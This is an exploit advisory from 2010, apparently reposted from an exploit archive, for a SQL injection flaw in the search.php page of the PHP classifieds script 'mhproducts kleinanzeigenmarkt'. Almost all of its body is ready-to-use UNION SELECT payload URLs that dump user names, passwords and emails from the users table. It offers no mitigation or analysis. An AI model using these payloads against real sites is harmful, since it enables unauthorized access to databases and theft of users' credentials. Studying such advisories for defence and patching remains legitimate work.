Home / os / winme

mhproducts kleinanzeigenmarkt (search.php) SQL Injection

Posted on 09 March 2010

======================================================== mhproducts kleinanzeigenmarkt (search.php) SQL Injection ======================================================== ----------------------------Information------------------------------------------------ +Name : mhproducts kleinanzeigenmarkt search.php SQL Injection +Autor : Easy Laster +Date : 09.03.2010 +Script : mhproducts kleinanzeigenmarkt +Download : ---------------- +Price : 9,99 euro +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/portal/search.php?c= #username +Exploitable : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2, 3,4,5,convert(name using utf8),7,8,9,10,11,12,13,14,15+from+users--+ #user pass +Exploitable : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2, 3,4,5,convert(password using utf8),7,8,9,10,11,12,13,14,15+from+users--+ or +Exploitable : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2, 3,4,5,concat(name,0x3a,password,0x3a,email)7,8,9,10,11,12,13,14,15+from+users--+ ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :